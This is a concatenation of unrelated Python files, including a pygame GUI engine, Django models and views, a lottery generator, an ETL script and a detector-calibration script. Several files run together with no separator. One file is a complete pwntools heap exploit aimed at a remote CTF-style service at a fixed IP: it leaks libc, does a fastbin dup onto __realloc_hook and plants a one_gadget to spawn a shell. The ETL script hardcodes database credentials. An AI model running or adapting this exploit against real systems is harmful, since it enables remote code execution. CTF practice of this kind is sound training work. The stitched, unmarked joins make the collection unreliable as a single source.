    exec('from %s import %s'%(script,MY_MODULES[script]),MODULES)

from multiprocessing import Queue,Event
import multiprocessing
import threading
import time,math
import os,platform
import numpy as np
from rz_global_clock import global_clock
from marker import Marker

SCREEN_SYNC = False
# Vertical-sync setup: only supported on Windows (SDL directx driver).
OS = platform.system().lower()
if OS == 'windows':
    try:
        os.putenv('SDL_VIDEODRIVER','directx')
        os.environ['SDL_VIDEODRIVER'] = 'directx'
        SCREEN_SYNC = True
    except: raise KeyError('add an environment variable "SDL_VIDEODRIVER" with value of "directx" into the computer')
    import win32api,win32con
    SCRW = win32api.GetSystemMetrics(win32con.SM_CXSCREEN)
    SCRH = win32api.GetSystemMetrics(win32con.SM_CYSCREEN)
elif OS == 'linux':
    pass
else:
    raise IOError('unrecognized system platform')

# Subclassing multiprocessing.Process is not reliable on Windows here, so the
# child process is started via an explicit module-level function
# (guiengine_proc). Main and child communicate through a Queue and an Event,
# wrapped by the GuiIF interface class which hides the raw Queue/Event ops.
# Example layout describing the screen plus one stimulus:
layout = {'screen':{'size':(200,200),'color':(0,0,0),'type':'normal',
          'Fps':60,'caption':'this is an example'},
          'cue':{'class':'sinBlock','parm':{'size':(100,100),'position':(100,100),
          'frequency':13,'visible':True,'start':False}}}
def guiengine_proc(args):
    """Process entry point: build a GuiEngine from the args dict and run it."""
    engine = GuiEngine(args['layout'],
                       args['Q_c2g'],
                       args['E_g2c'],
                       args['server_address'])
    engine.StartRun()
class GuiIF():  # interface used by the core process to signal the GUI engine
    def __init__(self,server_address = None,layout = layout):
        # Q_c2g payload forms:
        #   1. the string '_q_u_i_t_'       -> terminate flag
        #   2. [stimulus setting, marker]   -> stimulus update + marker dict
        self.Q_c2g = Queue()
        self.E_g2c = Event()
        self.layout = layout
        self.args = {'layout':self.layout,'Q_c2g':self.Q_c2g,'E_g2c':self.E_g2c,'server_address':server_address}

    def quit(self):
        # Ask the GUI process to shut down.
        self.Q_c2g.put('_q_u_i_t_')

    def wait(self):
        # Block until the GUI engine signals it has started.
        self.E_g2c.wait()

    def update(self,stimulus,marker):
        # Queue a stimulus update together with its marker dict.
        self.Q_c2g.put([stimulus,marker])
class GuiEngine():
    # Kept as class attributes for backward compatibility with the original
    # layout; __init__ rebinds self.stimuli so each instance has its own
    # registry (a shared mutable class attribute would leak between engines).
    stimuli = {}
    __release_ID_list = []

    def __init__(self,stims,Q_c2g,E_g2c,server_address):
        """
        stims: dict to define a stimulus.
            eg. stims = {'cue':{'class':'Block','parm':{'size':(100,40),'position':(0,0)}}}
        Q_c2g: multiprocessing.Queue, used for accepting stimulus control command from core process
        E_g2c: multiprocessing.Event, set once the engine is up
        server_address: the target server's address to accept marker

        properties describing the screen:
            size: (width,height)
            type: fullscreen/normal
            frameless: True/False
            color: (R,G,B)
            caption: string
            Fps: int, strongly suggest you set Fps as the same with system's Fps
        """
        # BUGFIX: assigning SCREEN_SYNC below used to create a *local*
        # variable, so windowed mode never disabled vsync and StartRun()
        # never fell back to clock.tick().  Declare the module global.
        global SCREEN_SYNC

        self.Q_c2g = Q_c2g
        self.E_g2c = E_g2c
        self.marker_on = False
        self.marker_event = {}
        self.stp = False
        self.lock = threading.Lock()
        self.stimuli = {}  # per-instance stimulus registry

        pygame.init()

        # Initialize the screen.  SCREEN_SYNC stays True only when the
        # Windows directx driver was configured AND the window is fullscreen.
        if stims['screen']['type'].lower() == 'fullscreen':
            self.screen = pygame.display.set_mode((0,0),FULLSCREEN | DOUBLEBUF | HWSURFACE,32)
        else:
            # Center the window (Windows only), leaving room for the taskbar.
            if OS == 'windows':
                w,h = stims['screen']['size']
                x = int((SCRW - w)/2.)
                y = int((SCRH - 50 - h)/2.) - 50
                os.environ['SDL_VIDEO_WINDOW_POS'] = '%i,%i'%(x,y)
            self.screen = pygame.display.set_mode(stims['screen']['size'], NOFRAME | DOUBLEBUF, 32)
            SCREEN_SYNC = False

        self.screen_color = stims['screen']['color']
        self.screen.fill(self.screen_color)
        pygame.display.set_caption(stims['screen']['caption'])
        self.Fps = stims['screen']['Fps']
        del stims['screen']

        self.ask_4_update_gui = False      # background thread asks the main loop to redraw
        self.update_in_this_frame = False  # set when the redraw happens in the current frame
        self.__update_per_frame_list = []  # objects refreshed every frame

        if server_address is None:
            # No marker server configured: install a stub that raises if
            # anyone actually tries to send a marker.
            class Marker():
                def __init__(self,sa):
                    pass
                def send_marker(self,marker):
                    raise Exception('marker_sender was not initilized because server_address parameter was not given')
        self.marker_sender = Marker(server_address)

        # Register stimuli: instantiate every configured class from MODULES.
        for ID in stims:
            element = stims[ID]
            clas = element['class']
            if clas in MODULES:
                self.stimuli[ID] = MODULES[clas](self.screen,**element['parm'])

        backthread = threading.Thread(target = self.backthreadfun, args = (), daemon = True)
        backthread.start()

    def backthreadfun(self):
        # Receives refresh requests from the core process via Q_c2g.
        # Possible payloads:
        #   1. the string '_q_u_i_t_'           -> terminate
        #   2. [stimulus setting, marker dict]  -> stimulus update + marker
        #      marker eg. {'mkr1':{'value':[0]}}
        while True:
            arg = self.Q_c2g.get()
            if arg == '_q_u_i_t_':
                self.stp = True  # stops the main loop in StartRun()
                break
            stimulus_arg,self.marker_event = arg  # marker is a dict
            self.lock.acquire()
            [self.stimuli[id].reset(**stimulus_arg[id]) for id in stimulus_arg]  # update stimulus parameters
            self.ask_4_update_gui = True  # request a redraw
            self.lock.release()
        print('[guiengine] sub thread ended')

    def StartRun(self):
        print('[guiengine] process started')
        self.E_g2c.set()
        clock = pygame.time.Clock()
        while True:
            self.screen.fill(self.screen_color)
            if self.ask_4_update_gui:  # background thread requested a redraw
                self.update_in_this_frame = True  # it will happen in this frame
                self.ask_4_update_gui = False

            # Draw stimuli sorted by their 'layer' attribute (higher = on top).
            stis = sorted(self.stimuli.items(),key=lambda k:k[1].layer)
            [s[1].show() for s in stis]
            pygame.display.flip()  # this frame is done
            if not SCREEN_SYNC: clock.tick(self.Fps)

            # A redraw was requested and completed in this frame: timestamp
            # pending markers so they align with the actual draw, then send.
            if self.update_in_this_frame:
                _clk = global_clock()
                if len(self.marker_event)>0:
                    for ky in self.marker_event:
                        self.marker_event[ky]['timestamp'] = _clk
                    self.marker_sender.send_marker(self.marker_event)
                self.update_in_this_frame = False

            pygame.event.get()
            if self.stp: break  # only the controller can end the loop
        pygame.quit()
        [self.stimuli[id].release() for id in self.stimuli]  # release stimulus resources
        print('[guiengine] process exit')
if __name__ == '__main__':
    gui = GuiIF()  # create the interface to the GUI process
    _ = multiprocessing.Process(target = guiengine_proc,args = (gui.args,))  # launch the GUI in a new process
    _.start()
    gui.wait()  # wait for the GUI engine to come up
    time.sleep(1)
    gui.update({'cue':{'start':True}},{})  # update the GUI and send a marker
    time.sleep(1)
    gui.update({'cue': {'start': False}},{})  # update the GUI and send a marker
    time.sleep(1)
    gui.quit()
|
# -*- coding:utf-8 -*-
from django.db import models
from django.contrib.auth.models import User
# Create your models here.
class College(models.Model):
    """Article for the college-overview section (verbose names are zh-CN)."""
    title = models.CharField(u'标题', max_length=500)
    show = models.BooleanField(u'是否发布', default=False)
    time = models.DateField(u'发布时间', auto_now_add=True)
    click = models.IntegerField(u'点击次数', editable=False,default=0)
    content = models.TextField(u'正文')
    url_name = models.CharField(u'url', editable=False, default='college', max_length=500)

    class Meta:
        ordering = ['-time']
        verbose_name_plural = u'学院概况'
        verbose_name = u'文章'

    def __unicode__(self):
        return u'%s' %self.title
class Faculty(models.Model):
    """Article for the faculty/staff section."""
    title = models.CharField(u'标题', max_length=500)
    show = models.BooleanField(u'是否发布', default=False)
    time = models.DateField(u'发布时间', auto_now_add=True)
    content = models.TextField(u'正文')
    click = models.IntegerField(u'点击次数', editable=False,default=0)
    url_name = models.CharField(u'url', editable=False, default='faculty', max_length=500)

    class Meta:
        ordering = ['-time']
        verbose_name_plural = u'师资队伍'
        verbose_name = u'文章'

    def __unicode__(self):
        return u'%s' %self.title
class Recruit(models.Model):
    """Article for the admissions-news section."""
    title = models.CharField(u'标题', max_length=500)
    show = models.BooleanField(u'是否发布', default=False)
    time = models.DateField(u'发布时间', auto_now_add=True)
    content = models.TextField(u'正文')
    click = models.IntegerField(u'点击次数', editable=False,default=0)
    url_name = models.CharField(u'url', editable=False, default='recruit', max_length=500)

    class Meta:
        ordering = ['-time']
        verbose_name_plural = u'招生动态'
        verbose_name = u'文章'

    def __unicode__(self):
        return u'%s' %self.title
class News(models.Model):
    """Article for the news section."""
    title = models.CharField(u'标题', max_length=500)
    show = models.BooleanField(u'是否发布', default=False)
    time = models.DateField(u'发布时间', auto_now_add=True)
    content = models.TextField(u'正文')
    click = models.IntegerField(u'点击次数', editable=False,default=0)
    url_name = models.CharField(u'url', editable=False, default='news', max_length=500)

    class Meta:
        ordering = ['-time']
        verbose_name_plural = u'新闻动态'
        verbose_name = u'文章'

    def __unicode__(self):
        return u'%s' %self.title
class Notice(models.Model):
    """Announcement for the notices section."""
    title = models.CharField(u'标题', max_length=500)
    show = models.BooleanField(u'是否发布', default=False)
    time = models.DateField(u'发布时间', auto_now_add=True)
    content = models.TextField(u'正文')
    click = models.IntegerField(u'点击次数', editable=False,default=0)
    url_name = models.CharField(u'url', editable=False, default='notice', max_length=500)

    class Meta:
        ordering = ['-time']
        verbose_name_plural = u'通知公告'
        verbose_name = u'通知'

    def __unicode__(self):
        return u'%s' %self.title
class CourseWare(models.Model):
    """Uploaded courseware file; author is set automatically (not editable)."""
    title = models.CharField(u'课件名称', max_length=500)
    time = models.DateField(u'发布时间', auto_now_add=True)
    course = models.FileField(u'课件',upload_to='media')
    show = models.BooleanField(u'是否发布', default=False)
    author=models.ForeignKey(User,editable=False)
    click = models.IntegerField(u'点击次数', editable=False,default=0)
    url_name = models.CharField(u'url', editable=False, default='courseware', max_length=500)

    class Meta:
        ordering = ['-time']
        verbose_name_plural = u'课件'
        verbose_name = u'课件'

    def __unicode__(self):
        return u'%s' %self.title
class International(models.Model):
    """Article for the international-exchange section."""
    title = models.CharField(u'标题', max_length=500)
    show = models.BooleanField(u'是否发布', default=False)
    time = models.DateField(u'发布时间', auto_now_add=True)
    content = models.TextField(u'正文')
    click = models.IntegerField(u'点击次数', editable=False,default=0)
    url_name = models.CharField(u'url', editable=False, default='communication', max_length=500)

    class Meta:
        ordering = ['-time']
        verbose_name_plural = u'国际交流'
        verbose_name = u'文章'

    def __unicode__(self):
        return u'%s' %self.title
class Rule(models.Model):
    """Article for the rules-and-regulations section."""
    title = models.CharField(u'标题', max_length=500)
    show = models.BooleanField(u'是否发布', default=False)
    time = models.DateField(u'发布时间', auto_now_add=True)
    content = models.TextField(u'正文')
    click = models.IntegerField(u'点击次数', editable=False,default=0)
    url_name = models.CharField(u'url', editable=False, default='rule', max_length=500)

    class Meta:
        ordering = ['-time']
        verbose_name_plural = u'规章制度'
        verbose_name = u'文章'

    def __unicode__(self):
        return u'%s' %self.title
class Employment(models.Model):
    """Article for the employment-information section."""
    title = models.CharField(u'标题', max_length=500)
    show = models.BooleanField(u'是否发布', default=False)
    time = models.DateField(u'发布时间', auto_now_add=True)
    content = models.TextField(u'正文')
    click = models.IntegerField(u'点击次数', editable=False,default=0)
    url_name = models.CharField(u'url', editable=False, default='employment', max_length=500)

    class Meta:
        ordering = ['-time']
        verbose_name_plural = u'就业信息'
        verbose_name = u'文章'

    def __unicode__(self):
        return u'%s' %self.title
class Link(models.Model):
    """External friendly link with a logo image URL."""
    title = models.CharField(u'标题', max_length=500)
    image = models.CharField(u'logo图片链接', max_length=500)
    url = models.CharField(u'链接', max_length=500)
    show = models.BooleanField(u'是否发布', default=False)
    time = models.DateField(u'发布时间', auto_now_add=True)
    click = models.IntegerField(u'点击次数', editable=False,default=0)
    url_name = models.CharField(u'url', editable=False, default='link', max_length=500)

    class Meta:
        ordering = ['-time']
        verbose_name_plural = u'友情链接'
        verbose_name = u'链接'

    def __unicode__(self):
        return u'%s' %self.title
from random import randint

# Generate the requested number of lottery games, each with six unique
# numbers drawn uniformly from 1..60 (Mega-Sena style).
jogos = []
aposta = []
quant = int(input('Gerar quantos jogos? '))
for _ in range(quant):
    aposta = []
    while len(aposta) < 6:
        num = randint(1, 60)
        # Keep only numbers not yet drawn for this game.
        if num not in aposta:
            aposta.append(num)
    jogos.append(aposta)
print(jogos)
|
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
from pwn import *

# local = 1 runs the binary locally; 0 attacks the remote service.
local = 0
link = '159.138.137.79:65267'
host,port = map(str.strip, link.split(':')) if link != '' else ("",0)

context.log_level = 'debug'
#context.terminal = "/home/noone/hyperpwn/hyperpwn-client.sh"
context.terminal = ['mate-terminal','--geometry=94x60--10-26','--hide-menubar', '-x','sh','-c',]
exe = './timu'
context.binary = exe
elf = ELF(exe)
libc = elf.libc
#don't forget to change it
if local:
    io = process(exe)
else:
    io = remote(host,port)

# Short aliases around the pwntools tube API.
s = lambda data : io.send(str(data))
sa = lambda delim,data : io.sendafter(str(delim), str(data))
sl = lambda data : io.sendline(str(data))
sla = lambda delim,data : io.sendlineafter(str(delim), str(data))
r = lambda numb=4096 : io.recv(numb)
rl = lambda : io.recvline().strip()
ru = lambda delim,drop=True : io.recvuntil(delim, drop)
rg = lambda regex : io.recvregex(regex)
rp = lambda timeout=1 : io.recvrepeat(timeout)
uu32 = lambda data : u32(data.ljust(4, '\x00'))  # unpack zero-padded little-endian u32
uu64 = lambda data : u64(data.ljust(8, '\x00'))  # unpack zero-padded little-endian u64
lg = lambda s,addr : io.success('\033[1;31;40m%20s--> 0x%x\033[0m'%(s,addr))  # pretty-print a leaked address
ga = lambda job="" : gdb.attach(io, job) if local else 0  # attach gdb only when running locally
ia = lambda : io.interactive()
# break on aim addr
def debug(addr,PIE=True):
    # For PIE binaries the runtime text base is read from /proc via pmap,
    # then the breakpoint is set at base + offset.
    if PIE:
        text_base = int(os.popen("pmap {}| awk '{{print $1}}'".format(io.pid)).readlines()[1], 16)
        gdb.attach(io,'b *{}'.format(hex(text_base+addr)))
    else:
        gdb.attach(io,"b *{}".format(hex(addr)))
# get_one_gadget
def get_one_gadget(filename):
    # Shell out to the `one_gadget` tool and return its candidate execve
    # gadget offsets as a list of ints (Python 2: map returns a list).
    try:
        import subprocess
    except Exception as e:
        print("subprocess not install")
        exit(0)
    return map(int, subprocess.check_output(['one_gadget', '--raw', filename]).split(' '))
#===========================================================
# EXPLOIT GOES HERE
#===========================================================
# Arch: amd64-64-little
# RELRO: Full RELRO
# Stack: Canary found
# NX: NX enabled
# PIE: PIE enabled
def choice(idx):
    # Decorator factory: before running the wrapped action, select menu
    # entry `idx` at the program's prompt.
    def wrap(f):
        def go(*args, **kargs):
            sla(" :\n", idx)
            f(*args, **kargs)
        return go
    return wrap
@choice(idx=1)
def new(size, content):
    # Menu 1: allocate a chunk of `size` bytes and fill it with `content`.
    sla(": \n", size)
    sla(": \n", content)
@choice(idx=2)
def delete(idx):
    # Menu 2: free the chunk at index `idx`.
    sla(": \n", idx)
@choice(idx=3)
def show():
    # Menu 3: print the chunk contents (used to leak heap/libc data).
    pass
def exp(host, rce=False):
    """Run the heap exploit; with rce=True finish with a one_gadget shell.

    Note: the `host` parameter shadows the module-level `host` and is unused
    in the body -- presumably kept for a uniform exploit signature.
    """
    if rce:
        one_gadget = get_one_gadget(libc.path)
    # --- heap grooming: lay out chunks so later frees overlap -------------
    new(0xf8, "A") #0
    new(0x18, "A") #1
    new(0x68, "A") #2
    new(0x68, "A") #4
    new(0x18, "A") #5
    delete(2)
    # re-allocate slot 2 and forge the size field of the following chunk
    # (0x20+0x70+0x100 spans chunks 1,2,3) -- sets up overlapping frees
    new(0x68, "A"*0x60 + p64(0x20+0x70+0x100)) #2
    delete(0)
    delete(3)
    new(0xf8, "A") #0
    # --- leak: read a main-arena pointer left in the overlapped chunk -----
    show()
    ru("1 : ")
    # 0x3c4b78 = offset of the leaked unsorted-bin pointer inside this libc
    libc.address = uu64(r(6)) - 0x3c4b78
    lg("libc", libc.address)
    # --- fastbin dup into __realloc_hook-0x1b, then hook hijack -----------
    delete(4)
    delete(2)
    new(0x48, "A"*0x10 + p64(0) + p64(0x71) + p64(libc.sym['__realloc_hook']-0x1b))
    new(0x68, "A")
    # overwrite __malloc_hook/__realloc_hook region: one_gadget via realloc+2
    # (the realloc prologue fixes the stack so the gadget's constraints hold)
    new(0x68, "A"*0xb + p64(libc.address + one_gadget[1]) + p64(libc.sym['realloc']+2))
    #new(0x68, "A"*0xb + p64(libc.address + one_gadget[0]) + p64(0xAAAAAAAA))
    # trigger malloc -> hook -> shell
    sl("1")
    sl("1")
    #ga()
    '''
    try:
        from LibcSearcher import *
    except Exception as e:
        print("LibcSearcher not install")
        exit(0)
    obj = LibcSearcher("fgets",leak_addr)
    libc_base = leak_addr - obj.dump("fgets")
    system_addr = libc_base + obj.dump("system")
    malloc_hook = libc_base + obj.dump("__malloc_hook")
    free_hook = libc_base + obj.dump("__free_hook")
    bin_sh_addr = libc_base + obj.dump("str_bin_sh")
    '''
    ia()
if __name__ == '__main__':
    # `host` comes from the connection setup at the top of the script
    exp(host,True)
|
import cv2
import numpy as np

print("Package Imported")

# Raw string avoids any accidental backslash escape in the Windows path
# (byte-for-byte identical here, but robust if the path ever changes).
img = cv2.imread(r'E:\Python Project\Resources\car.jpg')
if img is None:
    # cv2.imread returns None instead of raising when the file is missing
    # or unreadable; fail early with a clear message instead of an opaque
    # cv2.error from imshow().
    raise FileNotFoundError(r'Could not read image: E:\Python Project\Resources\car.jpg')

cv2.imshow("car", img)
cv2.waitKey(0)          # wait for any key press
cv2.destroyAllWindows()
import pandas as pd
import pymongo
import time
from sqlalchemy import create_engine
# Pull BVG timetable documents from MongoDB and load them into Postgres.
client = pymongo.MongoClient("my_mongodb")
db = client.infobvg
collection = db.koepenick

# Give the Mongo feed a head start before reading from it.
time.sleep(10)

entries = collection.find()

# NOTE(review): Engine.execute() is legacy API removed in SQLAlchemy 2.0;
# works on 1.x, would need a Connection on 2.x -- confirm pinned version.
pg = create_engine('postgresql://postgres:1234@my_postgres:5432/my_bvg_data', echo=True)
pg.execute('''
CREATE TABLE IF NOT EXISTS s_koepenick_timetable (
running_time VARCHAR,
delay VARCHAR,
type VARCHAR,
number VARCHAR,
direction VARCHAR,
name VARCHAR,
mode VARCHAR
);
''')

for entry in entries:
    running_time = entry['when']
    delay = entry['delay']
    # renamed local: `type` shadowed the builtin of the same name
    line_type = entry['line']['type']
    number = entry['line']['fahrtNr']
    direction = entry['direction']
    name = entry['line']['name']
    mode = entry['line']['mode']
    # parameterized insert -- values are never interpolated into the SQL string
    query = "INSERT INTO s_koepenick_timetable VALUES (%s, %s, %s, %s, %s, %s, %s);"
    pg.execute(query, (running_time, delay, line_type, number, direction, name, mode))

# Cleaning the data in the table
clean1_query = "ALTER TABLE s_koepenick_timetable ALTER COLUMN running_time TYPE TIMESTAMP WITHOUT TIME ZONE USING running_time::timestamp without time zone"
clean2_query = "ALTER TABLE s_koepenick_timetable ALTER COLUMN delay TYPE INT USING delay::integer"
pg.execute(clean1_query)
pg.execute(clean2_query)
|
import os.path

from lsst.utils import getPackageDir

# Start from the shared HSC ISR configuration shipped with obs_subaru.
config.load(os.path.join(getPackageDir("obs_subaru"), "config", "hsc", "isr.py"))

# Use the HSC-specific flat-combination task and its vignette settings.
from lsst.obs.hsc.detrends import HscFlatCombineTask
config.combination.retarget(HscFlatCombineTask)
config.combination.load(os.path.join(os.environ['OBS_SUBARU_DIR'], 'config', 'hsc', 'vignette.py'))
|
# -*- coding: utf-8 -*-
import json
from django.http import Http404
from django.core.serializers.json import DjangoJSONEncoder
from django.shortcuts import (
HttpResponse, redirect, render_to_response, RequestContext
)
from django.views.decorators.http import require_POST
from django.contrib.auth.decorators import login_required
from sorl.thumbnail import get_thumbnail
from photologue.models import Gallery
@login_required
def ajax_get_list_gallery(request):
    """Return JSON metadata (title, id, tags, created date, 100x100 cover
    thumbnail URL) for every gallery that has at least one public photo.

    Bug fix: the initial flag key was misspelled 'succes', so responses
    carried both a stale 'succes': False entry and the real 'success' flag.
    """
    json_data = dict(success=False, gallery=[])
    for gallery in Gallery.objects.all():
        try:
            im = get_thumbnail(
                gallery.public()[0].image,
                '100x100', crop='center', quality=99
            )
            data = dict(
                title=gallery.title,
                id=gallery.id,
                tags=gallery.tags,
                created=gallery.date_added,
                cover=im.url
            )
        except (IndexError, AttributeError):
            # gallery with no public photos (or missing image) -- skip it
            pass
        else:
            json_data['gallery'].append(data)
    json_data['success'] = True
    return HttpResponse(json.dumps(json_data, cls=DjangoJSONEncoder))
def ajax_get_gallery(request, gallery_id):
    """Return JSON with a 1000px-wide thumbnail URL (and caption, when set)
    for every photo in the gallery; 404 when the gallery does not exist."""
    json_data = {
        'success': False,
        "photos": [],
    }
    try:
        gallery = Gallery.objects.get(pk=gallery_id)
    except Gallery.DoesNotExist:
        raise Http404
    for photo in gallery.photos.all():
        thumb = get_thumbnail(photo.image, '1000', crop='center', quality=99)
        entry = {'image': thumb.url}
        if photo.caption:
            entry['caption'] = photo.caption
        json_data['photos'].append(entry)
    json_data['success'] = True
    return HttpResponse(json.dumps(json_data, cls=DjangoJSONEncoder))
|
#Copyright (C) 2016 Paolo Galeone <nessuno@nerdz.eu>
#
#This Source Code Form is subject to the terms of the Mozilla Public
#License, v. 2.0. If a copy of the MPL was not distributed with this
#file, you can obtain one at http://mozilla.org/MPL/2.0/.
#Exhibit B is not attached; this software is compatible with the
#licenses expressed under Section 1.12 of the MPL v2.
"""Define the interface to implement to work with Autoencoders"""
from abc import ABCMeta, abstractmethod
class Autoencoder(object, metaclass=ABCMeta):
    """Abstract interface that concrete autoencoder models must implement."""

    @abstractmethod
    def get(self, images, train_phase=False, l2_penalty=0.0):
        """ define the model with its inputs.
        Use this function to define the model in training and when exporting the model
        in the protobuf format.

        Args:
            images: model input
            train_phase: set it to True when defining the model, during train
            l2_penalty: float value, weight decay (l2) penalty

        Returns:
            is_training_: tf.bool placeholder enable/disable training ops at run time
            predictions: the model output
        """

    @abstractmethod
    def loss(self, predictions, real_values):
        """Return the loss operation between predictions and real_values

        Args:
            predictions: predicted values
            real_values: ground-truth values the predictions are compared against

        Returns:
            Loss tensor of type float.
        """
|
#!/apps/anaconda/anaconda-2.0.1/bin/python
from params import *

# Defaults, overridable from the command line below.
run = ''                        # run number to calibrate (required unless -f)
output = work_folder+'/calib'   # output file prefix
indir = replay_folder_me        # directory containing the replay .dst files
batch = False                   # submit a farm job instead of running locally
show = 0                        # progress-display setting passed to progress()
gains_file = ''                 # optional file with starting gains
final = None                    # if set, merge per-run results into final files
method = 'island'               # clustering method for hcevent

# input parameters
args = sys.argv
#if len(args)<3: sys.exit('no arguments')
for i,a in enumerate(args):
    if a in ['-r','-run']: run = args[i+1]
    # relative paths are anchored at the current working directory
    elif a in ['-o','-out']: output = args[i+1] if (args[i+1][0]=='/') else os.getcwd()+'/'+args[i+1]
    elif a in ['-i','-in']: indir = args[i+1] if (args[i+1][0]=='/') else os.getcwd()+'/'+args[i+1]
    elif a in ['-b','-batch']: batch = True
    elif a in ['-s','-show']: show = int(args[i+1])
    elif a in ['-f','-final']: final = args[i+1]
    elif a in ['-g','-gains']: gains_file = args[i+1] if (args[i+1][0]=='/') else os.getcwd()+'/'+args[i+1]
    elif a in ['-m','-method']: method = args[i+1]
###################
## uniting gains ##
###################
# With -f, merge the per-run calibration outputs into final gain files
# and a merged tree, then exit.
if final!=None:
    from misc_root import *
    # raw gains
    runs = sum_dict_lists(runs_list,'calib')
    # one [name, gain, count] table per run
    l = [readfile(output+'_'+str(run)+'.txt',[str,float,int]) for run in runs]
    # per module: count-weighted average gain over all runs; fall back to the
    # default gain 0.25 when no run has statistics for that module
    l2 = [[l[0][i][0],sum([x[i][1]*x[i][2] for x in l])/sum([x[i][2] for x in l]),sum([x[i][2] for x in l])] if sum([x[i][2] for x in l])!=0 else [l[0][i][0],0.25,0] for i in range(len(l[0]))]
    writelist(os.path.dirname(output)+'/gains_calib'+final+'_raw.txt',l2)
    sys.stdout.write('raw gains computed\n')
    # gaussian gains
    if gains_file == '': gains0 = [0.25 for i in range(1728)]
    else: gains0 = readfile(gains_file,[float],cols=[1])
    f = [TFile(output+'_'+str(run)+'.root') for run in runs]
    # summed E_cluster/E_gamma ratio histogram per module
    h = [TH1F('hratio_'+x+'_calib',';E_{cluster}/E_{#gamma};',500,0,2.5) for x in module_names]
    l2 = []
    for j,x in enumerate(f):
        sys.stdout.write(str(runs[j])+'\r')
        sys.stdout.flush()
        for i,y in enumerate(module_names):
            h[i].Add(x.Get(y).Get('hratio_'+y))
    for i in range(len(module_names)):
        # gaussian fit of the ratio peak; corrected gain = gain0 / peak mean
        h[i].Fit('gaus','qww','',0.5,2.5)
        m = h[i].GetFunction('gaus').GetParameter(1)
        g = gains0[i]/m if m!=0. else gains0[i]
        # relative width of the peak (unnormalised when the mean is 0)
        s = h[i].GetFunction('gaus').GetParameter(2)/m if m!=0. else h[i].GetFunction('gaus').GetParameter(2)
        l2.append([module_names[i],g,s])
    writelist(os.path.dirname(output)+'/gains_calib'+final+'_gaus.txt',l2)
    sys.stdout.write('gaussian gains computed\n')
    # merging trees
    c = TChain('hycal','hycal')
    for run in runs: c.Add(output+'_'+str(run)+'.root')
    c.Merge(os.path.dirname(output)+'/tree_calib'+final+'.root')
    sys.stdout.write('merging trees finished\n')
    sys.exit()
# A run number is mandatory from here on.
if run=='': sys.exit('no run mentionned')

################
## batch mode ##
################
# Submit this same script as a farm job (re-invoked without -b) and exit.
if batch:
    jsub(project='prad',track='analysis',jobname=os.path.basename(output)+'_'+run,command=os.getcwd()+'/calibrate_calib.py',options='-o '+os.path.basename(output)+' -i . -r '+run+' -g '+gains_file+' -s '+str(show)+' -m '+method,input_files=indir+'/prad_'+run.zfill(6)+'.dst',output_data=os.path.basename(output)+'_'+run+'*',output_template=os.path.dirname(output)+'/@OUTPUT_DATA@',disk_space='10 GB',memory='1024 MB')
    # Python 2 bare print: emit a blank line after the submission output
    print
    sys.exit()
##########
## Main ##
##########
# initialisation
from readdst import *
from tagger import *
from hycal import *
from misc_root import *

# Open the replay data for this run and skip the start-up events.
t = chao(run=int(run),folder=indir)
t.goto(20000)
t.lload = ['','adc','tdc']

# Starting gains: uniform 0.25 unless a gains file was given (column 1).
if gains_file == '': gains0 = [0.25 for i in range(1728)]
else: gains0 = readfile(gains_file,[float],cols=[1])
ped0 = get_pedestal(t.run)
sigma_ped0 = get_pedestal_sigma(t.run)
lms_gains0 = get_lms_gains(t.run,889,979)

# Output ROOT file and per-module histograms (1728 HyCal modules).
fout = TFile(output+'_'+run+'.root','recreate')
henergy = [TH1F('henergy_'+module_names[i],'',500,0.,1500) for i in range(1728)]
# NOTE(review): axis title says 'cluter' (typo kept -- it is a runtime string)
hratio = [TH1F('hratio_'+module_names[i],';E_{cluter}/E_{#gamma};',500,0.,2.5) for i in range(1728)]
hx = [TH1F('hx_'+module_names[i],'',400,-20.,20.) for i in range(1728)]
hy = [TH1F('hy_'+module_names[i],'',400,-20.,20.) for i in range(1728)]
htrigger = [[TH1F('htrigger_'+module_names[i]+'_'+str(j),'',500,0.,1500) for i in range(1728)] for j in range(6)]

# Output tree layout: (branch name, type code, array suffix).
l = [('iev','i',''),('trigger','i',''),('E_g','f',''),('xpos','f',''),('ypos','f',''),('n_cl','i',''),('mid','i','[n_cl]'),('E_cl','f','[n_cl]'),('x_cl','f','[n_cl]'),('y_cl','f','[n_cl]'),('chi2_cl','f','[n_cl]'),('nhit_cl','i','[n_cl]'),('nleak_cl','i','[n_cl]'),('nneigh_cl','i','[n_cl]'),('status_cl','i','[n_cl]')]
tree,var = tree_init('hycal',l,nmax=100)

# Running per-module gain accumulators: sum of E/E_gamma and event counts.
lgain = [0. for i in range(1728)]
ln = [0 for i in range(1728)]
# loop on events
for ev in progress(t,modulo=10000,show=show):
    # stability and trigger cuts
    if t.isepics: continue
    if event_is_bad(ev.iev,t.run): continue
    if ev.trigger not in [1,2,5]: continue
    # tagger energy: keep TDC hits within a 25 ns window, merge, take the first
    etc = TDCHits([x for x in get_etchannels(ev=ev) if abs(x.t)<25])
    if etc==[]: continue
    etc = etc.merge()
    eg = t.epics['MBSY2C_energy']*etc[0].E
    # hycal event reconstruction with the current gain/pedestal constants
    hev = hcevent(ev,2,gains=gains0,peds=ped0,sigma_peds=sigma_ped0,lms_gains=lms_gains0,method=method)
    if hev.clusters==[]: continue
    # tree filling; translate table-encoder EPICS readings to cm
    xtrans = (t.epics['hallb_ptrans_x_encoder']+652.05)/10.
    ytrans = (-(t.epics['hallb_ptrans_y1_encoder']+t.epics['hallb_ptrans_y2_encoder'])/2.-3761.5)/10.
    var['iev'][0] = ev.iev
    var['trigger'][0] = ev.trigger
    var['E_g'][0] = eg
    var['xpos'][0] = xtrans
    var['ypos'][0] = ytrans
    n_cl = 0
    # clusters
    for cl in hev.clusters:
        # keep clusters carrying at least half the photon energy
        if cl.E/eg<0.5: continue
        htrigger[ev.trigger][cl.mid].Fill(eg)
        if cl.E<100 or cl.nhit<3: continue
        # accumulate the per-module gain statistics
        lgain[cl.mid]+=cl.E/eg
        ln[cl.mid]+=1
        # tree
        var['mid'][n_cl] = cl.mid
        var['E_cl'][n_cl] = cl.E
        var['x_cl'][n_cl] = cl.x
        var['y_cl'][n_cl] = cl.y
        var['chi2_cl'][n_cl] = cl.chi2
        var['nhit_cl'][n_cl] = len(cl.hits)
        var['nleak_cl'][n_cl] = len(cl.leaks)
        # NOTE(review): identical to nleak_cl -- likely a copy-paste slip;
        # probably meant the cluster's neighbour count. Confirm upstream.
        var['nneigh_cl'][n_cl] = len(cl.leaks)
        var['status_cl'][n_cl] = cl.status
        n_cl+=1
        # histos (physics triggers only)
